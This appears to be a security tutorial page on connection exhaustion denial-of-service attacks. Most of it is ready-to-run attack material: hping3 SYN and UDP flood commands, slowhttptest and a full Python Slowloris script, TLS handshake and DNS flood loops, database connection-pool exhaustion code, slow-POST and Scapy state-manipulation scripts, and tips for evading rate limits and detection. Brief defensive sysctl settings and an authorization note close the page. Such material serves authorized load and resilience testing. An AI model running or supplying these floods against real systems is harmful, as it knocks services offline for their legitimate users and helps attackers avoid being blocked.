Connection Exhaustion
Understanding Connection Exhaustion - Resource Depletion Attacks
What is Connection Exhaustion?
Simple Definition: Connection exhaustion attacks overwhelm target systems by consuming all available connection resources, preventing legitimate users from establishing new connections and causing denial of service.
Technical Definition: Connection exhaustion exploits finite system resources such as TCP connection tables, file descriptors, memory buffers, and thread pools by creating excessive numbers of connections or maintaining connections in specific states that consume maximum resources while providing minimal functionality.
Why Connection Exhaustion Works
Connection exhaustion attacks succeed due to fundamental resource limitations in network systems:
- Finite Connection Tables: Systems have limited capacity for tracking active connections
- Memory Constraints: Each connection consumes kernel memory for state tracking
- Thread Pool Limits: Application servers have limited worker threads for handling connections
- File Descriptor Limits: Operating systems limit the number of open file handles per process
Attack Process Breakdown
Normal Connection Management
- Connection Request: Client initiates connection to server service
- Resource Allocation: Server allocates memory, file descriptors, and processing resources
- Service Delivery: Server processes client requests using allocated resources
- Connection Cleanup: Resources released when connection terminates normally
- Resource Recycling: Available resources returned to pool for new connections
Connection Exhaustion Attack
- Resource Discovery: Identify target system connection limits and resource constraints
- Connection Flooding: Generate massive numbers of connection requests
- Resource Consumption: Consume available connection slots and system resources
- State Manipulation: Keep connections in resource-intensive states
- Service Denial: Prevent legitimate users from accessing target services
Real-World Impact
Service Unavailability: Prevent legitimate users from accessing web applications, databases, or network services
System Performance Degradation: Cause severe slowdowns even for existing connections
Cascading Failures: Trigger failures in dependent systems that rely on target services
Financial Impact: Cause revenue loss through service unavailability
Reputation Damage: Impact customer trust through unreliable service availability
Technical Concepts
TCP Connection States
SYN_SENT: Connection request sent, waiting for acknowledgment SYN_RECEIVED: SYN received, sending SYN-ACK response ESTABLISHED: Connection fully established and ready for data transfer FIN_WAIT: Connection closing, waiting for final acknowledgment TIME_WAIT: Connection closed, waiting for potential retransmissions
Resource Consumption Vectors
Connection Table Exhaustion: Fill available connection tracking slots Memory Exhaustion: Consume available system memory through connection state Thread Pool Exhaustion: Consume all available worker threads File Descriptor Exhaustion: Exceed process or system file descriptor limits
Attack Categories
SYN Flooding: Exhaust half-open connection resources Slowloris: Maintain many slow connections to exhaust thread pools HTTP POST Flooding: Use partial HTTP requests to consume application resources SSL/TLS Exhaustion: Exploit expensive cryptographic operations
Technical Implementation
Prerequisites
Network Requirements:
- Understanding of target system architecture and resource limits
- Ability to generate high volumes of connection requests
- Knowledge of target application connection handling
Essential Tools:
- Hping3: TCP connection manipulation and flooding
- Slowhttptest: Application-layer connection exhaustion
- Siege: HTTP load testing and connection flooding
- Scapy: Custom connection state manipulation
Essential Command Sequence
Step 1: Target Resource Assessment
# Identify target services and ports
nmap -sS -p 1-65535 192.168.1.100
# Discover all open TCP ports
# Identify services that accept connections
# Focus on high-value targets (web, database, SSH)
# Test connection limits
netstat -an | grep :80 | wc -l
# Count current connections to web server
# Provides baseline for connection capacity
# Helps estimate attack requirements
# Analyze connection behavior
tcpdump -i eth0 -c 100 'host 192.168.1.100 and port 80'
# Monitor normal connection patterns
# Understand connection lifetime and cleanup
# Identify opportunities for resource exhaustionPurpose: Understand target system capacity and connection handling behavior before launching exhaustion attacks.
Step 2: Basic SYN Flooding Attack
# SYN flood to exhaust connection table
hping3 -S --flood -p 80 192.168.1.100
# -S: SYN flag only
# --flood: Send packets as fast as possible
# Creates many half-open connections
# Controlled SYN flood with specific rate
hping3 -S -i u1000 -p 80 192.168.1.100
# -i u1000: 1000 microsecond intervals (1000 pps)
# More controlled resource consumption
# Adjustable rate based on target capacity
# Multi-port SYN flooding
for port in 80 443 22 3389; do
hping3 -S --flood -p $port 192.168.1.100 &
done
# Attack multiple services simultaneously
# Distribute attack across different resources
# Harder to mitigate with per-service limitsStep 3: Application-Layer Connection Exhaustion
Slowloris Attack with Slowhttptest:
# Slowloris attack against web server
slowhttptest -c 1000 -H -g -o slowloris_results -i 10 -r 50 -t GET -u http://192.168.1.100/
# -c 1000: 1000 concurrent connections
# -H: Slowloris mode (slow headers)
# -i 10: 10-second intervals between header lines
# -r 50: 50 connections per second
# Exhausts web server thread pool
# Monitor attack effectiveness
curl -I http://192.168.1.100/ --max-time 5
# Test if legitimate requests still work
# Timeout indicates successful exhaustion
# Monitor response times during attackCustom Slowloris Implementation:
#!/usr/bin/env python3
import socket
import threading
import time
import random
def slowloris_attack(target_ip, target_port, connections=200):
"""Custom Slowloris implementation"""
sockets = []
# Create initial connections
for i in range(connections):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((target_ip, target_port))
# Send partial HTTP request
sock.send(f"GET /?{random.randint(0, 2000)} HTTP/1.1\r\n".encode())
sock.send(f"User-Agent: Mozilla/5.0\r\n".encode())
sock.send(f"Accept-language: en-US,en,q=0.5\r\n".encode())
sockets.append(sock)
print(f"Created connection {i+1}")
except Exception as e:
print(f"Connection {i+1} failed: {e}")
# Maintain connections by sending slow headers
while True:
print(f"Maintaining {len(sockets)} connections...")
for sock in sockets[:]:
try:
sock.send(f"X-a: {random.randint(1, 5000)}\r\n".encode())
except:
sockets.remove(sock)
# Add new connections to replace dropped ones
while len(sockets) < connections:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((target_ip, target_port))
sock.send("GET / HTTP/1.1\r\n".encode())
sockets.append(sock)
except:
break
time.sleep(15) # Send header every 15 seconds
# Launch attack
slowloris_attack("192.168.1.100", 80, 500)Step 4: SSL/TLS Connection Exhaustion
# SSL handshake exhaustion
while true; do
echo | openssl s_client -connect 192.168.1.100:443 >/dev/null 2>&1 &
# Initiate SSL handshake without completing
# Forces server to perform expensive cryptographic operations
# Consumes CPU and memory resources
done
# Parallel SSL exhaustion
for i in {1..100}; do
(while true; do
echo | openssl s_client -connect 192.168.1.100:443 >/dev/null 2>&1
sleep 0.1
done) &
done
# 100 parallel SSL connection attempts
# Sustained cryptographic load on target
# Can exhaust SSL-capable servers quicklyStep 5: Database Connection Pool Exhaustion
PostgreSQL Connection Exhaustion:
#!/usr/bin/env python3
import psycopg2
import threading
import time
def exhaust_postgres_connections(host, database, user, password, max_connections=100):
"""Exhaust PostgreSQL connection pool"""
connections = []
for i in range(max_connections):
try:
conn = psycopg2.connect(
host=host,
database=database,
user=user,
password=password
)
# Keep connection alive with slow query
cursor = conn.cursor()
cursor.execute("SELECT pg_sleep(3600);") # 1-hour sleep
connections.append(conn)
print(f"Established connection {i+1}")
except Exception as e:
print(f"Connection {i+1} failed: {e}")
break
print(f"Established {len(connections)} connections")
# Keep connections alive
while True:
time.sleep(60)
print(f"Maintaining {len(connections)} connections")
# Example usage (requires valid credentials)
# exhaust_postgres_connections("192.168.1.100", "testdb", "user", "pass")MySQL Connection Exhaustion:
# MySQL connection flooding
for i in {1..100}; do
mysql -h 192.168.1.100 -u testuser -ppassword -e "SELECT SLEEP(3600);" &
done
# Creates 100 long-running MySQL connections
# Each executes 1-hour sleep query
# Exhausts MySQL connection poolAttack Variations
HTTP POST Flooding
#!/usr/bin/env python3
import requests
import threading
def slow_post_attack(target_url, connections=50):
"""Slow HTTP POST attack"""
def send_slow_post():
try:
# Start POST request but send data very slowly
response = requests.post(
target_url,
data={'large_field': 'x' * 1000000}, # Large payload
timeout=300,
stream=True
)
except:
pass
# Launch multiple slow POST requests
for i in range(connections):
thread = threading.Thread(target=send_slow_post)
thread.start()
print(f"Started slow POST {i+1}")
# Example usage
# slow_post_attack("http://192.168.1.100/upload", 100)UDP Connection Exhaustion
# UDP connection table flooding
hping3 -2 --flood -p 53 192.168.1.100
# Floods UDP connection tracking
# Can exhaust stateful firewall resources
# Affects systems maintaining UDP session state
# DNS connection exhaustion
for i in {1..10000}; do
dig @192.168.1.100 test$i.example.com &
done
# Floods DNS server with queries
# Exhausts DNS resolver resources
# Can impact DNS service availabilityMulti-Protocol Exhaustion
# Coordinate exhaustion across multiple protocols
hping3 -S --flood -p 80 192.168.1.100 & # HTTP
hping3 -S --flood -p 443 192.168.1.100 & # HTTPS
hping3 -S --flood -p 22 192.168.1.100 & # SSH
hping3 -S --flood -p 3389 192.168.1.100 & # RDP
# Distributed resource exhaustion
# Harder to mitigate with service-specific controls
# Tests overall system resilienceCommon Issues and Solutions
Problem: Attack not effective against target
- Solution: Increase connection count, target different services, combine with other attack types
Problem: Limited source connections available
- Solution: Use multiple source IP addresses, increase local connection limits, distribute attack
Problem: Target implementing connection limits
- Solution: Rotate source addresses, target multiple services, use application-layer attacks
Problem: Attack easily detected and blocked
- Solution: Reduce attack intensity, use legitimate traffic patterns, distribute timing
Advanced Techniques
Resource Competition Attacks
#!/usr/bin/env python3
import socket
import threading
import time
def resource_competition_attack(target_ip, target_port):
"""Force target to compete for limited resources"""
# Create connections that consume maximum resources
heavy_connections = []
for i in range(50):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
# Send request that triggers expensive operations
request = f"GET /heavy-computation?size=1000000 HTTP/1.1\r\n"
request += f"Host: {target_ip}\r\n"
request += "Connection: keep-alive\r\n\r\n"
sock.send(request.encode())
heavy_connections.append(sock)
except Exception as e:
print(f"Heavy connection {i} failed: {e}")
print(f"Established {len(heavy_connections)} resource-intensive connections")Adaptive Connection Management
# Monitor target capacity and adapt attack
#!/bin/bash
TARGET="192.168.1.100"
PORT="80"
CONNECTIONS=100
while true; do
# Test current connection success rate
SUCCESS=$(hping3 -S -c 10 -p $PORT $TARGET 2>/dev/null | grep -c "flags=SA")
if [ $SUCCESS -lt 5 ]; then
echo "High failure rate detected, reducing connections"
CONNECTIONS=$((CONNECTIONS - 10))
else
echo "Increasing connection pressure"
CONNECTIONS=$((CONNECTIONS + 10))
fi
# Launch adapted attack
hping3 -S -c $CONNECTIONS -p $PORT $TARGET
sleep 10
doneState Transition Exploitation
#!/usr/bin/env python3
from scapy.all import *
def exploit_state_transitions(target_ip, target_port):
"""Exploit TCP state transitions for resource consumption"""
# Create connections in expensive states
for i in range(100):
# Send SYN
syn = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
syn_ack = sr1(syn, timeout=2)
if syn_ack and syn_ack.haslayer(TCP):
# Send ACK to establish connection
ack = IP(dst=target_ip)/TCP(dport=target_port,
sport=syn_ack[TCP].dport,
seq=syn_ack[TCP].ack,
ack=syn_ack[TCP].seq+1,
flags="A")
send(ack)
# Immediately send FIN to enter closing state
fin = IP(dst=target_ip)/TCP(dport=target_port,
sport=syn_ack[TCP].dport,
seq=syn_ack[TCP].ack,
ack=syn_ack[TCP].seq+1,
flags="FA")
send(fin)
# Connection now in resource-intensive closing stateDetection and Prevention
Detection Indicators
- Rapid increase in connection count from single or multiple sources
- High percentage of incomplete or abnormal connection states
- Sustained high connection rates without corresponding legitimate traffic
- Resource utilization spikes (CPU, memory, file descriptors)
- Service response time degradation or timeouts
Prevention Measures
System Configuration:
# Increase connection limits
echo "net.core.somaxconn = 65536" >> /etc/sysctl.conf
echo "net.ipv4.tcp_max_syn_backlog = 65536" >> /etc/sysctl.conf
# Enable SYN cookies
echo "net.ipv4.tcp_syncookies = 1" >> /etc/sysctl.conf
# Reduce timeout values
echo "net.ipv4.tcp_fin_timeout = 15" >> /etc/sysctl.confApplication Protection:
- Implement connection rate limiting
- Configure appropriate timeout values
- Deploy load balancers with connection limits
- Use connection pooling and reuse strategies
Network Defense:
- Deploy DDoS protection services
- Implement SYN flood protection
- Configure firewall connection limits
- Use intrusion prevention systems
Professional Context
Legitimate Use Cases
- Capacity Testing: Determining system connection limits and scaling requirements
- Load Testing: Validating application performance under connection stress
- Failover Testing: Testing system behavior when connection limits are reached
- Security Assessment: Evaluating DoS protection mechanisms
Legal and Ethical Requirements
Authorization: Connection exhaustion can cause complete service outages - explicit written permission essential
Scope Definition: Clearly identify target systems and acceptable impact levels
Impact Assessment: Document potential for service disruption and system instability
Recovery Planning: Ensure ability to restore normal service quickly after testing
Connection exhaustion attacks highlight the importance of proper resource management and capacity planning, demonstrating how finite system resources can be weaponized to deny service to legitimate users.